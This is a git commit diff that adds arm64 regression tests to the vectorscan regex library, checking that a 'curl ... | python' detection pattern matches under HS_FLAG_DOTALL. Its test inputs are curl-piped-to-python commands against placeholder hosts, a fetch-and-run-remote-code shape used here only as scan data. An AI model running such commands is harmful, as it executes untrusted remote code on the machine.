From: Not So Chiken
Date: Thu, 16 Apr 2026 10:06:53 +0000 (+0100)
Subject: Add unit tests for bug with arm64 HS_FLAG_DOTALL causing false negatives (#391)
X-Git-Url: http://git.ipfire.org/?a=commitdiff_plain;p=thirdparty%2Fvectorscan.git

Add unit tests for bug with arm64 HS_FLAG_DOTALL causing false negatives (#391)
---

diff --git a/unit/hyperscan/regressions.cpp b/unit/hyperscan/regressions.cpp
index 320b0d06..eb3bcd90 100644
--- a/unit/hyperscan/regressions.cpp
+++ b/unit/hyperscan/regressions.cpp
@@ -277,3 +277,205 @@ TEST(bug317, regressionOnx86Bug317) {
     hs_free_database(database);
     err = hs_free_scratch(scratch);
 }
+
+// Regression tests for #391: on arm64, patterns compiled with HS_FLAG_DOTALL
+// produced false negatives. Every test below compiles a single pattern in
+// block mode, scans one input, and requires that the match callback fired.
+
+// DOTALL + "\s*" pattern, input with a 3-character hostname.
+TEST(ArmRegression, FalseNegativeWithBackslashS_Short) {
+    hs_database_t *db = nullptr;
+    hs_compile_error_t *compile_err = nullptr;
+
+    const char *pattern = "curl.*\\|\\s*python";
+    hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK,
+                                nullptr, &db, &compile_err);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(db != nullptr);
+
+    hs_scratch_t *scratch = nullptr;
+    err = hs_alloc_scratch(db, &scratch);
+    ASSERT_EQ(HS_SUCCESS, err);
+
+    const char *input = "curl http://xxx:8000 2>&1 | python";
+
+    bool matched = false;
+    // Match callback: sets the bool that ctx points to (&matched below).
+    auto cb = [](unsigned int, unsigned long long, unsigned long long,
+                 unsigned int, void *ctx) -> int {
+        *static_cast<bool *>(ctx) = true;
+        return 0;
+    };
+
+    err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(matched) << "Pattern should match input with 3-char hostname";
+
+    hs_free_scratch(scratch);
+    hs_free_database(db);
+}
+
+// DOTALL + "\s*" pattern, input with a 4-character hostname.
+TEST(ArmRegression, FalseNegativeWithBackslashS_Long) {
+    hs_database_t *db = nullptr;
+    hs_compile_error_t *compile_err = nullptr;
+
+    const char *pattern = "curl.*\\|\\s*python";
+    hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK,
+                                nullptr, &db, &compile_err);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(db != nullptr);
+
+    hs_scratch_t *scratch = nullptr;
+    err = hs_alloc_scratch(db, &scratch);
+    ASSERT_EQ(HS_SUCCESS, err);
+
+    const char *input = "curl http://xxxx:8000 2>&1 | python";
+
+    bool matched = false;
+    // Match callback: sets the bool that ctx points to (&matched below).
+    auto cb = [](unsigned int, unsigned long long, unsigned long long,
+                 unsigned int, void *ctx) -> int {
+        *static_cast<bool *>(ctx) = true;
+        return 0;
+    };
+
+    err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(matched) << "Pattern should match input with 4-char hostname";
+
+    hs_free_scratch(scratch);
+    hs_free_database(db);
+}
+
+// DOTALL + "\s*" pattern, real-world style "curl ... | python" input.
+TEST(ArmRegression, FalseNegativeWithBackslashS_RealWorld) {
+    hs_database_t *db = nullptr;
+    hs_compile_error_t *compile_err = nullptr;
+
+    const char *pattern = "curl.*\\|\\s*python";
+    hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK,
+                                nullptr, &db, &compile_err);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(db != nullptr);
+
+    hs_scratch_t *scratch = nullptr;
+    err = hs_alloc_scratch(db, &scratch);
+    ASSERT_EQ(HS_SUCCESS, err);
+
+    const char *input = "curl http://vader:8080 2>&1 | python";
+
+    bool matched = false;
+    // Match callback: sets the bool that ctx points to (&matched below).
+    auto cb = [](unsigned int, unsigned long long, unsigned long long,
+                 unsigned int, void *ctx) -> int {
+        *static_cast<bool *>(ctx) = true;
+        return 0;
+    };
+
+    err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(matched) << "Pattern should match real-world curl|python input";
+
+    hs_free_scratch(scratch);
+    hs_free_database(db);
+}
+
+// DOTALL with "[ \t]*" in place of "\s*", input with a 4-character hostname.
+TEST(ArmRegression, FalseNegativeWithBackslashS_CharClassAlsoFails) {
+    hs_database_t *db = nullptr;
+    hs_compile_error_t *compile_err = nullptr;
+
+    const char *pattern = "curl.*\\|[ \\t]*python";
+    hs_error_t err = hs_compile(pattern, HS_FLAG_DOTALL, HS_MODE_BLOCK,
+                                nullptr, &db, &compile_err);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(db != nullptr);
+
+    hs_scratch_t *scratch = nullptr;
+    err = hs_alloc_scratch(db, &scratch);
+    ASSERT_EQ(HS_SUCCESS, err);
+
+    const char *input = "curl http://xxxx:8000 2>&1 | python";
+
+    bool matched = false;
+    // Match callback: sets the bool that ctx points to (&matched below).
+    auto cb = [](unsigned int, unsigned long long, unsigned long long,
+                 unsigned int, void *ctx) -> int {
+        *static_cast<bool *>(ctx) = true;
+        return 0;
+    };
+
+    err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(matched) << "Pattern with [ \\t]* should match (but fails due to bug)";
+
+    hs_free_scratch(scratch);
+    hs_free_database(db);
+}
+
+// "\s*" pattern compiled with flags = 0 (no DOTALL), 3-character hostname.
+TEST(ArmRegression, NoDotAll_Short) {
+    hs_database_t *db = nullptr;
+    hs_compile_error_t *compile_err = nullptr;
+
+    const char *pattern = "curl.*\\|\\s*python";
+    hs_error_t err = hs_compile(pattern, 0, HS_MODE_BLOCK,
+                                nullptr, &db, &compile_err);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(db != nullptr);
+
+    hs_scratch_t *scratch = nullptr;
+    err = hs_alloc_scratch(db, &scratch);
+    ASSERT_EQ(HS_SUCCESS, err);
+
+    const char *input = "curl http://xxx:8000 2>&1 | python";
+
+    bool matched = false;
+    // Match callback: sets the bool that ctx points to (&matched below).
+    auto cb = [](unsigned int, unsigned long long, unsigned long long,
+                 unsigned int, void *ctx) -> int {
+        *static_cast<bool *>(ctx) = true;
+        return 0;
+    };
+
+    err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(matched) << "Without DOTALL: 3-char hostname should match";
+
+    hs_free_scratch(scratch);
+    hs_free_database(db);
+}
+
+// "\s*" pattern compiled with flags = 0 (no DOTALL), 4-character hostname.
+TEST(ArmRegression, NoDotAll_Long) {
+    hs_database_t *db = nullptr;
+    hs_compile_error_t *compile_err = nullptr;
+
+    const char *pattern = "curl.*\\|\\s*python";
+    hs_error_t err = hs_compile(pattern, 0, HS_MODE_BLOCK,
+                                nullptr, &db, &compile_err);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(db != nullptr);
+
+    hs_scratch_t *scratch = nullptr;
+    err = hs_alloc_scratch(db, &scratch);
+    ASSERT_EQ(HS_SUCCESS, err);
+
+    const char *input = "curl http://xxxx:8000 2>&1 | python";
+
+    bool matched = false;
+    // Match callback: sets the bool that ctx points to (&matched below).
+    auto cb = [](unsigned int, unsigned long long, unsigned long long,
+                 unsigned int, void *ctx) -> int {
+        *static_cast<bool *>(ctx) = true;
+        return 0;
+    };
+
+    err = hs_scan(db, input, strlen(input), 0, scratch, cb, &matched);
+    ASSERT_EQ(HS_SUCCESS, err);
+    ASSERT_TRUE(matched) << "Without DOTALL: 4-char hostname should match";
+
+    hs_free_scratch(scratch);
+    hs_free_database(db);
+}